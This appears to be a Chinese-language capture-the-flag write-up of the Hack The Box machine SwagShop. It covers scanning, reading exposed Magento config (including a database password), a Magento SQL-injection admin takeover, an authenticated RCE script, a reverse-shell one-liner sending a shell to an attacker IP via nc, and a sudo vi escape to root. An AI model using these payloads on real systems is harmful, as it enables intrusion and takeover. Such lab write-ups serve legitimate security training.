Hack The Box - SwagShop
目标IP为10.10.10.140:
nmap -p- -Pn -sV -sC -T4 10.10.10.140
Nmap scan report for 10.10.10.140
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Did not follow redirect to http://swagshop.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 485.25 seconds
22端口有个用户名枚举的漏洞,但我并不想利用:
searchsploit OpenSSH
OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py
访问80端口获取到如下页面:
Wappalyzer为我很好的枚举出了目标web页面的大致信息,Magento的Web应用程序,PHP语言环境,右下角有一个建议我输入邮箱订阅的输入框,并在页脚提醒了我站点的时间,2014:
我试图去点击页面为我提供的按钮,发现它跳转的URL规则:
http://swagshop.htb/index.php/customer/account/login/
http://swagshop.htb/index.php/5-x-hack-the-box-square-sticker.html?SID=rbc125sp335vg3tsv1qioob711
http://swagshop.htb/index.php/5-x-hack-the-box-square-sticker.html?SID=rbc125sp335vg3tsv1qioob711
无论点哪里的按钮,其路径都是在index.php下,然后我发现一个登录框:
但它看起并不像是管理人员使用的。我尝试搜寻Magento的相关漏洞,搜到了很多。但是我并没有目标Magento程序的具体版本号。我尝试对其进行路径爆破:
[16:57:21] Starting:
[16:57:33] 200 - 10KB - /LICENSE.txt
[16:57:44] 200 - 571KB - /RELEASE_NOTES.txt
[16:57:48] 200 - 37B - /api.php
[16:57:48] 301 - 310B - /app -> http://swagshop.htb/app/
[16:57:48] 200 - 2KB - /app/
[16:57:48] 403 - 300B - /app/.htaccess
[16:57:48] 200 - 5KB - /app/etc/config.xml
[16:57:48] 200 - 2KB - /app/etc/local.xml
[16:57:48] 200 - 9KB - /app/etc/local.xml.additional
[16:57:48] 200 - 2KB - /app/etc/local.xml.template
[16:57:53] 200 - 717B - /cron.sh
[16:57:53] 200 - 0B - /cron.php
[16:57:57] 200 - 2KB - /errors/
[16:57:57] 301 - 313B - /errors -> http://swagshop.htb/errors/
[16:57:58] 200 - 1KB - /favicon.ico
[16:58:01] 200 - 946B - /includes/
[16:58:01] 301 - 315B - /includes -> http://swagshop.htb/includes/
[16:58:01] 200 - 16KB - /index.php
[16:58:01] 200 - 44B - /install.php
[16:58:02] 301 - 309B - /js -> http://swagshop.htb/js/
[16:58:02] 301 - 318B - /js/tiny_mce -> http://swagshop.htb/js/tiny_mce/
[16:58:02] 200 - 4KB - /js/tiny_mce/
[16:58:03] 200 - 3KB - /lib/
[16:58:03] 301 - 310B - /lib -> http://swagshop.htb/lib/
[16:58:06] 200 - 2KB - /media/
[16:58:06] 301 - 312B - /media -> http://swagshop.htb/media/
[16:58:10] 200 - 886B - /php.ini.sample
[16:58:12] 301 - 314B - /pkginfo -> http://swagshop.htb/pkginfo/
[16:58:15] 403 - 300B - /server-status
[16:58:15] 403 - 301B - /server-status/
[16:58:16] 301 - 312B - /shell -> http://swagshop.htb/shell/
[16:58:16] 200 - 2KB - /shell/
[16:58:16] 301 - 311B - /skin -> http://swagshop.htb/skin/
[16:58:22] 301 - 310B - /var -> http://swagshop.htb/var/
[16:58:22] 200 - 2KB - /var/
[16:58:22] 200 - 755B - /var/backups/
[16:58:22] 200 - 4KB - /var/cache/
[16:58:22] 200 - 9KB - /var/package/
我找到了它的配置文件,其中有条像是具体版本号的东西:
http://swagshop.htb/app/code/community/Phoenix/Moneybookers/etc/config.xml
<version>1.6.0.0version>
我又发现了一个xml文件,它的时间有些不同,还有一个奇怪的key:
http://swagshop.htb/app/etc/local.xml
config>
<date>Wed, 08 May 2019 07:23:09 +0000date>
<key>b355a9e0cd018d3f7f03607141518419key>
我好像还看到了mysql数据库root用户的密码,但是目标并没有开放数据库端口让我远程链接:
<host>localhosthost>
<username>rootusername>
<password>fMVWh7bDHpgZkyfqQXreTjU9password>
<dbname>swagshopdbname>
<initStatements>SET NAMES utf8initStatements>
<model>mysql4model>
<type>pdo_mysqltype>
或许我可以去ssh试一下,不出意外的并不行:
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.140' (ED25519) to the list of known hosts.
root@10.10.10.140's password:
Permission denied, please try again.
root@10.10.10.140's password:
还有看起来像是计划任务的脚本cron.sh,但抱歉它是空的。还有它的安装脚本:
http://swagshop.htb/install.php
我还发现一些这样的东西:
大概浏览了一下,收获颇丰,还有目标看起来像是管理员登陆的页面,但是它又显示了另一个时间2022:
http://swagshop.htb/index.php/admin/
我想先试着寻找已经公开的漏洞:
searchsploit Magento
--------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------- ---------------------------------
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection |
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denia |
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username |
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.p |
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting |
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File |
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution |
Magento eCommerce - Local File Disclosure |
Magento eCommerce - Remote Code Execution |
Magento Server MAGMI Plugin - Multiple Vulnerabilities |
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion |
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypa |
--------------------------------------------------------------------------- ---------
诱惑力最大的永远都是远程代码执行:
Magento eCommerce - Remote Code Execution
该Magento eCommerce - Remote Code Execution漏洞利用创建一个新的管理员帐户forme/forme作为凭据。我只需要修改目标并启动它以获得管理员帐户,这是它的利用脚本,当然searchploit的也可以用,但是 需要自己去改:
https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
该漏洞其实就是一个SQL注入:
就这样,我便拿到了目标后台权限:
接下来我需要使用另一个漏洞进行远程代码执行,
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
searchsploit提供的漏洞利用脚本会出现一些错误,我开发功底其实很差,我还看不懂,但网上很多wp写的都是直接利用成功的,可能哪里更新了年代不一样了吧。我花了很多时间找到了如下文章,它与我遇到的问题是一样的,但是他细分析了很多原因细节并解决掉了该问题,如有需要可自行去查看:
https://dtwh.medium.com/hack-the-box-swagshop-walkthrough-without-metasploit-8b9f03c480e7
获取到漏洞利用脚本需要对其内部参数值进行一些更改:
# Config.
username = 'try' #用户名
password = 'again' #密码
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000' #时间 This needs to be the exact date from /app/etc/local.xml
时间可通过以下命令获取到目标页面的时间:
curl -s 10.10.10.140/app/etc/local.xml | grep date
<date>date>
然后我可以执行如下命令,使目标建立一个反向shell:
python2 poc.py 'http://10.10.10.140/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.3 1337 >/tmp/f"
另一边监听对应端口即可:
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.140] 45610
sh: 0: can't access tty; job control turned off
$ whoami
www-data
升级下shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l 告诉了我些信息:
www-data@swagshop:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
而编辑器中可以切换跳转到当前身份的shell,我可以用以下命令获取root shell:
sudo /usr/bin/vi /var/www/html/api.php -c ':!/bin/sh' /dev/null
"/var/www/html/api.php" 88L, 2834C
:!/bin/sh
# whoami
whoami
root
#
user.txt:
root@swagshop:/home/haris# cat user.txt
cat user.txt
a4.............................
root.txt:
root@swagshop:~# cat root.txt
cat root.txt
c2b087.........................
___ ___
/| |/|\| |\
/_| ´ |.` |_\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|___|.__| https://hackthebox.store/password
PS: Use root flag as password!